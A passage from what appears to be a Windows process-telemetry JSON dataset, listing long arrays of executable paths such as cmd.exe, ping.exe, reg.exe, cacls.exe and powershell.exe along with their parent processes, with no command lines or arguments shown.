(x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\compattelrunner.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\wsqmcons.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\windows\\\\system32\\\\wsqmcons.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\usoclient.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\"],\"new_process_lc_par\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\